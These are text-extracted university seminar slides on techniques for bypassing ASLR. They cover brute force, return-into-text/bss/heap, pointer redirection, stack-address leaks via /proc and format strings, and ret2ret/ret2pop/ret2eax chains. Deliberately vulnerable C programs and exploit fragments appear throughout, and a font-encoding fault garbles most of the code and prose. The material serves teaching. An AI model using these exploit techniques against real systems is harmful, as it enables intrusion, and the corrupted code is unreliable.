ASLR Address Space Layout Randomization Seminar on Advanced Exploitation Techniques Chair of Computer Science 4 RWTH Aachen Tilo Mller Computer Science, Informatik 4 Communication and Distributed Systems What is ASLR? A securit! technolo"! to prevent exploitation of #uffer overflo$s Most popular alternative% &onexecuta#le stac' Ena#led #! default since (ernel )*+*,) -)../0 1 2ista 3eta ) -)..+0 Earlier third part! implementations% 4a5 -since )...0 Computer Science, Informatik 4 Communication and Distributed Systems o! does ASLR !ork? AS6R 7 Address Space 6a!out Randomi8ation Aim% 9ntroduce randomness into the address space of each instantiation -)4 #its of a :)#it address are randomi8ed0 ; Addresses of infiltrated shellcode are not predictive an!more ; Common Exploitation techniques fail< #ecause the place of the shellcode is un'no$n , st inst* ) st inst* bfaa2e58 bf9114c8 p r o c e s s
m e m o r ! p r o c e s s
m e m o r ! s t a c ' ... ... bfaa2e14 bfaa2e10 bf911484 bf911480 Computer Science, Informatik 4 Communication and Distributed Systems o! does ASLR !ork? unsigned long getEBP(void) { __asm__(movl %ebp,%eax); } int main(void) { printf(EBP: %xn,getEBP()); } getEBP.c =emonstration% ! "#getEBP EBP:bffff3b8 ! "#getEBP EBP:bffff3b8 ASL disabled! ! "#getEBP EBP:bfaa2e58 ! "#getEBP EBP:bf9114c8 ASL enabled! Computer Science, Informatik 4 Communication and Distributed Systems What is randomized? >nl! the stac' and li#raries e*"* not the heap< text< data and #ss se"ment =emonstration% ! $at #pro$#self#maps % egrep &(lib$%'eap%sta$()& )*)+,)))-)*).e))) r/-p )*)+,))) )):)) ) 0'eap1 b2e3e)))-b2fa3))) r-xp )))))))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so b2fa3)))-b2fa.))) r--p ))4+2))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so b2fa.)))-b2fa*))) r/-p ))4+*))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so bfa),)))-bfa66))) r/-p bffeb))) )):)) ) 0sta$(1 $at #pro$#self#maps % egrep &(lib$%'eap%sta$()& )*)+,)))-)*).e))) r/-p )*)+,))) )):)) ) 0'eap1 b2,a))))-b2ee2))) r-xp )))))))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so b2ee2)))-b2ee*))) r--p ))4+2))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so b2ee*)))-b2eea))) r/-p ))4+*))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so bfa*.)))-bfa5b))) r/-p bffeb))) )):)) ) 0sta$(1 Computer Science, Informatik 4 Communication and Distributed Systems "#er#ie! of ASLR resistant e$p%oits ,* 3rute force )* Return into nonrandomi8ed memor! :* 4ointer redirectin" 4* Stac' divul"in" methods /* Stac' ?u""lin" methods More methods can be found in the paper (e.g. GOT hijacking or overwriting .dtors) Computer Science, Informatik 4 Communication and Distributed Systems &' (ruteforce Success of #ruteforce is #ased on% The tolerance of an exploit to variations in the address space la!out (e.g. how many NOs can be p!aced in the buffer) Ho$ man! exploitation attempts can #e performed (e.g. it is necessary that a network daemon restarts after crash) Ho$ fast the exploitation attempts can #e performed (e.g. !oca!!y vs. over network) void f8n$tion(c"a# 9args) { c"a# b8ff0+)5.1; str$p:(b8ff, args); } int main(int arg$, c"a# 9argv01) { f8n$tion(argv041); #etu#n ); } vuln.c Example% Computer Science, Informatik 4 Communication and Distributed Systems &' (ruteforce )(* + R941 #f*** 4,-. byte )S* + shell code *** &>4s plausi#le value R941 #f*** shell code *** &>4s R941 #f*** shell code *** &>4s miss miss hit & / 0 Computer Science, Informatik 4 Communication and Distributed Systems &' (ruteforce Chance% , to ) )4 14.@+ 7 4.@+ ; ).4A attempts on avera"e Solution% Bp"rade to a +4#it architecture #! /bin/sh $"ile 0 ) 1; do "#v8ln ;"#exploit <i; i=<((<i > 6)+*)) if 0 <i ?gt 4.22264. 1; t"en i=) fi done; 9t ta'es a#out : minutes on a ,*/ CH8 C4B to "et the exploit $or'in"% """ @et8rn A,,ress: )xbfa7*5)4 "#br8tefor$e"s': line 5: 45)*4 Begmentation fa8lt @et8rn A,,ress: )xbfa754)4 s'-7"4< Examplar! #ruteforce attac'% Computer Science, Informatik 4 Communication and Distributed Systems "#er#ie! ,* 3rute force )* Return into nonrandomi8ed memor! :* 4ointer redirectin" 4* Stac' divul"in" methods /* Stac' ?u""lin" methods Computer Science, Informatik 4 Communication and Distributed Systems /' Return into non1randomized memory not randomi8ed randomi8ed ; Exploitation Techniques% ret)heap ret)#ss ret)data ret)text Stac'% parameters and d!namic local varia#les Heap% d!namicall! created data structures -malloc0 3SS% uninitiali8ed "lo#al and static local varia#les =ata% initiali8ed "lo#al and static local varia#les Text% readonl! pro"ram code Computer Science, Informatik 4 Communication and Distributed Systems /a' ret/te$t The text re"ion is mar'ed readonl! ; it is ?ust possi#le to manipulate the pro"ram flo$ -advanced% #orro$ed code0 void p8bli$(c"a#9 args) { c"a# b8ff0461; str$p:(b8ff,args); printf(p8bli$n); } void se$ret(void) { printf(se$retn); } int main(int arg$, c"a#9 argv01) { if (get8i,() == )) se$ret(); else p8bli$(argv041); } vuln.c Example% Computer Science, Informatik 4 Communication and Distributed Systems /a' ret/te$t #! /bin/bash "#v8ln ;perl -e &print CACx4.; print Cxfax*7x)+x)*C&; e%&loit.s" *** stac' text R94 1 .x.A.4A:fa SD4 1 AAAA #uff 1 AAAA 0x080483fa: void secret(void) Computer Science, Informatik 4 Communication and Distributed Systems /b' ret/bss c"a# globalb8f063.1; void f8n$tion(c"a#9 inp8t) { $'ar lo$alb8f063.1; str$p:(lo$alb8f, inp8t); str$p:(globalb8f, lo$alb8f); } int main(int arg$, c"a#99 argv) { f8n$tion(argv041); } vuln.c The #ss se"ment contains the uninitiali8ed "lo#al varia#les% T$o #uffers are needed< one on the stac' and one in the #ss se"ment Computer Science, Informatik 4 Communication and Distributed Systems /b' ret/bss *** stac' -randomi8ed0 #ss -not randomi8ed0 .x.A.4@/e. AAAA AAAA 0x080495e0: "lo#al #uff local #uff shellcode shellcode AAAA R94 SD4 Computer Science, Informatik 4 Communication and Distributed Systems /c' ret/data /d' ret/heap Similar to ret)#ss* Examples of vulnera#le code% =ata% 9nitiali8ed "lo#al varia#les Heap% =!namicall! created data structures c"a#' globalb8f = CAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; void f8n$tion(c"a#9 inp8t) { c"a# lo$alb8f063.1; str$p:(lo$alb8f, inp8t); str$p:(globalb8f, lo$alb8f); } void f8n$tion(c"a#9 inp8t) { c"a# lo$al_b8ff063.1; c"a# 9'eap_b8ff; str$p:(lo$al_b8ff,inp8t); 'eap_b8ff = (c"a# 9) mallo$(siDeof(lo$al_b8ff)); str$p:('eap_b8ff,lo$al_b8ff); } Computer Science, Informatik 4 Communication and Distributed Systems "#er#ie! ,* 3rute force )* Return into nonrandomi8ed memor! :* 4ointer redirectin" 4* Stac' divul"in" methods /* Stac' ?u""lin" methods Computer Science, Informatik 4 Communication and Distributed Systems 0' *ointer redirectin2 Hardcoded strin"s are saved $ithin nonrandomi8ed areas ; 9t is possi#le to redirect a strin" pointer to another one 9nterestin" strin" pointers are ar"uments of system, execve, ... Example% int main(int arg$, c"a#9 args01) { c"a# inp8t063.1; c"a# 9$onf = Ctest -f E#"progr$C; c"a# 9li$ense = CFGHB BIJFKA@E HB P@ILHMEM"""nC; printf(li$ense); str$p:(inp8t,args041); if (s:stem($onf)) printf(CError: missing "progr$nC); } vuln.c Coal% Execute system(THIS S!T"#$% IS...&'()) ; system tries to execute THIS ; $rite a script called THIS< e*"*% #! /bin/bash #bin#bas' Computer Science, Informatik 4 Communication and Distributed Systems 0' *ointer redirectin2 *** stac' data input Econf Elicense 0x08048562 0x08048550 THIS S!T"#$% IS ... test *f +,.-ro.rc s:stem($onf) = s:stem(test -f E#"progr$) Computer Science, Informatik 4 Communication and Distributed Systems 0' *ointer redirectin2 *** stac' data input Econf Elicense 0x08048562 0x08048562 THIS S!T"#$% IS ... test *f +,.-ro.rc s:stem($onf) = s:stem(FGHB BIJFKA@E HB""") AAAA Computer Science, Informatik 4 Communication and Distributed Systems 0' *ointer redirectin2 int main(int arg$, c"a#9 args01) { c"a# inp8t063.1; c"a# 9$onf = Ctest -f E#"progr$C; c"a# 9li$ense = CFGHB BIJFKA@E HB P@ILHMEM"""nC; printf(li$ense); str$p:(inp8t,args041); if (s:stem($onf)) printf(CError: missing "progr$nC); } vuln.c #! /bin/sh e$'o C#bin#s'C ! FGHB $'mo, 222 FGHB PAFG=":<PAFG "#v8ln ;perl -e &print CACx63.; print Cx.6x*3x)+x)*Cx6&; e%&loit.s" Computer Science, Informatik 4 Communication and Distributed Systems "#er#ie! ,* 3rute force )* Return into nonrandomi8ed memor! :* 4ointer redirectin" 4* Stac' divul"in" methods /* Stac' ?u""lin" methods Computer Science, Informatik 4 Communication and Distributed Systems 4' Stack di#u%2in2 methods #define SA struct sockaddr int listenf,, $onnf,; void f8n$tion(c"a#9 str) { c"a# rea,b8f063.1; c"a# /riteb8f063.1; str$p:(rea,b8f,str); sprintf(/riteb8f,rea,b8f); /rite($onnf,,/riteb8f,strlen(/riteb8f)); } int main(int arg$, c"a#9 argv01) { c"a# line04)6+1; st#uct so$(a,,r_in serva,,r; ssiDe_t n; listenf, = so$(et (AJ_HNEF, BIOP_BF@EAQ, )); bDero(Rserva,,r, siDeof(serva,,r)); serva,,r"sin_famil: = AJ_HNEF; serva,,r"sin_a,,r"s_a,,r = 'tonl(HNAMM@_ANS); serva,,r"sin_port = 'tons(222.); bin,(listenf,, (BA9)Rserva,,r, siDeof(serva,,r)); listen(listenf,, 4)6+); fo#(;;) { $onnf, = a$$ept(listenf,, (BA9)NTUU,NTUU); /rite($onnf,,C! C,6); n = rea,($onnf,, line, siDeof(line)-4); line0n1 = ); f8n$tion(line); $lose($onnf,); } } vuln.c Coal% =iscover informations a#out the address space la!out 4ossi#ilit! ,% Stac' stethoscope -,-roc,/-id0,stat0 4ossi#ilit! )% Dormat strin" vulnera#ilities Computer Science, Informatik 4 Communication and Distributed Systems 4a' Stack stethoscope Address of a process stac'Fs #ottom% )A th item of ,-roc,/-id0,stat The remainin" stac' can #e calculated< since offsets are constant The statfile is reada#le #! ever! user per default% 0 dir ,-roc,1(-idof v23'),stat *r**r**r** 4 5008*05*56 55:04 ,-roc,45356,stat =isadvanta"e%Access to the machine is required Advanta"e% AS6R is almost useless if one have this access Computer Science, Informatik 4 Communication and Distributed Systems 4a' Stack stethoscope stac' #ottom *** function main SD4 R94 read#uf $rite#uf constant offset -#fe,4f:. G #fe,4A/A 7 +dA0 Computer Science, Informatik 4 Communication and Distributed Systems 4a' Stack stethoscope stac' #ottom function main SD4 R94 read#uf $rite#uf shellcode s# offset s# 7 cat ,-roc,1(-idof v23'),stat 7 a89 :; -ri't 158 <: offset 7 6d8 *** Computer Science, Informatik 4 Communication and Distributed Systems 4b' 3ormat strin2s #define SA struct sockaddr int listenf,, $onnf,; void f8n$tion(c"a#9 str) { c"a# rea,b8f063.1; c"a# /riteb8f063.1; str$p:(rea,b8f,str); sprintf(/riteb8f,rea,b8f); /rite($onnf,,/riteb8f,strlen(/riteb8f)); } int main(int arg$, c"a#9 argv01) { c"a# line04)6+1; st#uct so$(a,,r_in serva,,r; ssiDe_t n; listenf, = so$(et (AJ_HNEF, BIOP_BF@EAQ, )); bDero(Rserva,,r, siDeof(serva,,r)); serva,,r"sin_famil: = AJ_HNEF; serva,,r"sin_a,,r"s_a,,r = 'tonl(HNAMM@_ANS); serva,,r"sin_port = 'tons(222.); bin,(listenf,, (BA9)Rserva,,r, siDeof(serva,,r)); listen(listenf,, 4)6+); fo#(;;) { $onnf, = a$$ept(listenf,, (BA9)NTUU,NTUU); /rite($onnf,,C! C,6); n = rea,($onnf,, line, siDeof(line)-4); line0n1 = ); f8n$tion(line); $lose($onnf,); } } vuln.c H Dormat strin" vulnera#ilit!< that can #e used to receive stac' addresses Correct% s-ri'tf(8rite=2f,(>s(,read=2f)) Advanta"e% &o access to the machine is required* Computer Science, Informatik 4 Communication and Distributed Systems s p r i n t f - 0 f u n c t i o n - 0 SD4 R94 I).Jx *** *** #f#K,ecA ). th parameter a#ove the format strin" *** stac' #ottom constant offset =f=?5550 * =f=?4ec8 @ 688 4b' 3ormat strin2s ; The stac' #ottom can #e calculated #! an exploitation of the format strin" vulnera#ilit! ; After$ards the exploit from the stethoscope attac' can #e used a"ain Example% 0 ecAo B>50&1xB 7 & 0 'c 3oca3Aost ???6 0 =f=?4ec8 Computer Science, Informatik 4 Communication and Distributed Systems "#er#ie! ,* 3rute force )* Return into nonrandomi8ed memor! :* 4ointer redirectin" 4* Stac' divul"in" methods /* Stac' ?u""lin" methods Computer Science, Informatik 4 Communication and Distributed Systems 3ased on a pointer that is a potentia! pointer to the shellcode* S3* RI* #uff *ointer *** 4a' ret/ret Computer Science, Informatik 4 Communication and Distributed Systems A potential pointer points to the shellcode if its last si"nificant #!te is over$ritten #! 8ero -strin" termination0* 3ut ho$ to use this ali"ned pointer as return instruction pointerL LL *ointer $,, LL #uff &>4s *** shellcode *** 4a' ret/ret Computer Science, Informatik 4 Communication and Distributed Systems Solution% chain of retFs* ret can #e found in the text se"ment -$hich is not randomi8ed0 5ret *ointer $,, 5ret #uff &>4s *** shellcode *** 4a' ret/ret Computer Science, Informatik 4 Communication and Distributed Systems 5ret *ointer $,, 5ret #uff &>4s *** shellcode *** 4a' ret/ret )S* + )I* + )(* + #-0 a-0 leave = movl %ebp,%esp popl %ebp ret = popl %eip function eplio"ue of #% Computer Science, Informatik 4 Communication and Distributed Systems 5ret *ointer $,, 5ret #uff &>4s *** shellcode *** 4a' ret/ret )S* + )I* + )(* + #-0 a-0 leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems 5ret *ointer $,, 5ret #uff &>4s *** shellcode *** 4a' ret/ret )S* + )I* + )(* + ??? #-0 a-0 leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems 5ret *ointer $,, 5ret #uff &>4s *** shellcode *** 4a' ret/ret )S* + )I* + )(* + ??? #-0 a-0 leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems 5ret *ointer $,, 5ret #uff &>4s *** shellcode *** 4a' ret/ret )S* + )I* + )(* + ??? #-0 a-0 leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems 5ret *ointer $,, 5ret #uff &>4s *** shellcode *** 4a' ret/ret )S* + )I* + )(* + ??? #-0 a-0 leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems 5ret *ointer $,, 5ret #uff 6"*s *** shellcode *** 4a' ret/ret )S* + )I* + )(* + ??? #-0 a-0 leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems 5ret *ointer $,, 5ret #uff 6"*s *** she%%code *** 4a' ret/ret )S* + )I* + )(* + ??? #-0 a-0 leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems vuln.c #define RET 0x0804840f int main(void) { c"a# 9b8ff, 9ptr; long 9a,r_ptr; int b8f_siDe = 6*); int ret_siDe = 6);
b8ff0b8f_siDe1 = &)&; printf(C%sC,b8ff); #etu#n ); } e%&loit.c void f8n$tion(c"a#9 overflo/) { c"a# b8ffer063.1; str$p:(b8ffer, overflo/); } int main(int arg$, c"a#99 argv) { int no = 4; int9 ptr = Rno; f8n$tion(argv041); #etu#n 4; } 4a' ret/ret Computer Science, Informatik 4 Communication and Distributed Systems After strc-y the shellcode is stored redundant in the memor!* 9dea% Bse a perfect pointer to the shellcode placed in ar.v* S3* RI* #uff *ointer ar2# shellcode ''' 4b' ret/pop )I* 7 Computer Science, Informatik 4 Communication and Distributed Systems 4ro#lem% Avoid over$ritin" the last si"nificant #!te of the perfect pointer #! 8ero* S3* RI* #uff ar2# *ointer $,, 5 4b' ret/pop ''' shellcode Computer Science, Informatik 4 Communication and Distributed Systems Solution% A retchain follo$ed #! -o-*ret. The pop instruction s'ips over the memor! location $hich is over$ritten #! 8ero* *** 5ret #uff *ointer $,, shellcode 5pop1ret *** 4b' ret/pop ar2# ''' shellcode Computer Science, Informatik 4 Communication and Distributed Systems vuln.c #define POPRET 0x0804846 #define RET 0x08048468 int main(void) { c"a# 9b8ff, 9ptr; long 9a,r_ptr; int i;
b8ff06.+>strlen(s'ell$o,e)1 = &)&; printf(C%sC,b8ff); #etu#n ); } void f8n$tion($'ar9 str) { c"a# b8f063.1; str$p:(b8f,str); } int main(int arg$, c"a#99 argv) { int W = 3*.67; f8n$tion(argv041); #etu#n 4; } vuln.c e%&loit.c 4c' ret/esp Computer Science, Informatik 4 Communication and Distributed Systems Return values are stored in EA5* ; EA5 could contain a perfect shellcode pointer after a function returns a pointer to user input* ; >ver$rite R94 #! a pointer to a ca33 D>eax instr8$tion Example: strc-y(=2f,str) returns a pointer to =2f< i*e* =2f-tr @ strc-y(=2f,str)) effects EA5 and =2f-tr to point to the same location as =2f 4d' ret/ea$ vuln.c voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } Computer Science, Informatik 4 Communication and Distributed Systems )(* 8 )S* 8 RI* S3* #uf 4d' ret/ea$ )A: 7 ? voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 Computer Science, Informatik 4 Communication and Distributed Systems )(* 8 )S* 8 RI* S3* #uf 4d' ret/ea$ )A: 7 ? voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 s t r c p ! - 0 *** SD4 R94 Computer Science, Informatik 4 Communication and Distributed Systems )(* 8 )S* 8 #uf 4d' ret/ea$ )A: 7 ? voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 s t r c p ! - 0 *** SD4 R94 Mcall EIeax shellcode *** *** *** Computer Science, Informatik 4 Communication and Distributed Systems )(* 8 )S* 8 #uf 4d' ret/ea$ )A: + voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 shellcode *** *** *** Mcall EIeax Computer Science, Informatik 4 Communication and Distributed Systems )(* 8 )S* 8 #uf 4d' ret/ea$ )A: + voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 shellcode *** *** *** leave = movl %ebp,%esp popl %ebp ret = popl %eip 9 )I* Mcall EIeax Computer Science, Informatik 4 Communication and Distributed Systems )(* 8 )S* 8 #uf 4d' ret/ea$ )A: + voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 shellcode *** *** *** leave = movl %ebp,%esp popl %ebp ret = popl %eip 9 )I* Mcall EIeax Computer Science, Informatik 4 Communication and Distributed Systems )(* 7 ? )S* 8 #uf 4d' ret/ea$ )A: + voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 shellcode *** *** *** leave = movl %ebp,%esp popl %ebp ret = popl %eip 9 )I* Mcall EIeax Computer Science, Informatik 4 Communication and Distributed Systems )(* 7 ? )S* 8 #uf 4d' ret/ea$ )A: + voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 shellcode *** *** *** Mcall EIeax leave = movl %ebp,%esp popl %ebp ret = popl %eip 9 )I* $all 9%eax Computer Science, Informatik 4 Communication and Distributed Systems )(* 7 ? )S* 8 #uf 4d' ret/ea$ )A: + voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 shellcode *** *** *** Mcall EIeax leave = movl %ebp,%esp popl %ebp ret = popl %eip $all 9%eax )I* + Computer Science, Informatik 4 Communication and Distributed Systems )(* 7 ? )S* 8 #uf 4d' ret/ea$ )A: + voi, f8n$tion($'ar9 str) { $'ar b8f063.1; str$p:(b8f, str); } int main(int arg$, $'ar 99argv) { f8n$tion(argv041); ret8rn 4; } m a i n - 0 f u n c t i o n - 0 shellcode *** *** *** Mcall EIeax leave = movl %ebp,%esp popl %ebp ret = popl %eip $all 9%eax )I* + Computer Science, Informatik 4 Communication and Distributed Systems vuln.c #define %A&&EA' 0x080484($ int main(void) { c"a# 9b8ff, 9ptr; long 9a,r_ptr;